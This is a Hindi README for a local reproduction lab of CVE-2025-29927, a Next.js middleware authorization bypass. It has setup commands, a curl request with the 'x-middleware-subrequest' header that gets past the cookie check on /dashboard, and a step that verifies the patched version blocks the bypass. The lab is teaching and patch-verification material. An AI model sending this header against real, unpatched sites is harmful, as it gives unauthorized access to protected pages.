
CVE-2025-29927 के लिए रिप्रोडक्शन लैब — Next.js मिडलवेयर प्राधिकरण बाईपास (CVSS 9.1)
CVE-2025-29927 के लिए न्यूनतम पुनरुत्पादन लैब — Next.js मिडलवेयर प्राधिकरण बायपास (CVSS 9.1)।
संबंधित लेख: Medium पर N-Day विश्लेषण लेख
एक Next.js 15.2.2 ऐप (असुरक्षित) जिसमें कुकी द्वारा नियंत्रित /dashboard रूट है। एक एकल HTTP हैडर भेजकर मिडलवेयर प्रमाणीकरण जांच को बायपास किया जा सकता है — किसी क्रेडेंशियल की आवश्यकता नहीं है।
git clone https://github.com/SwapnilDeshpande/cve-2025-29927-lab
cd cve-2025-29927-lab
npm install # pins to Next.js 15.2.2 (vulnerable)
npm run dev -- --port 3001
चरण 1 — पुष्टि करें कि मिडलवेयर बिना प्रमाणीकरण वाले अनुरोधों को ब्लॉक करता है:
curl -s -o /dev/null -w "%{http_code}" http://localhost:3001/dashboard
# → 307
चरण 2 — सबरिक्वेस्ट हैडर से मिडलवेयर को बायपास करें:
curl -s -o /dev/null -w "%{http_code}" \
-H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \
http://localhost:3001/dashboard
# → 200
चरण 3 — पैच किए गए संस्करण में अपग्रेड करें और पुष्टि करें कि बायपास ब्लॉक हो गया है:
npm install [email protected]
# Restart the dev server, then repeat Step 2
# → 307
| रूट | एक्सेस |
|---|---|
/ | सार्वजनिक |
/login | सार्वजनिक |
/dashboard | मिडलवेयर द्वारा सुरक्षित (session कुकी आवश्यक है) |
Next.js < 15.2.3, < 14.2.25, < 13.5.9, < 12.3.5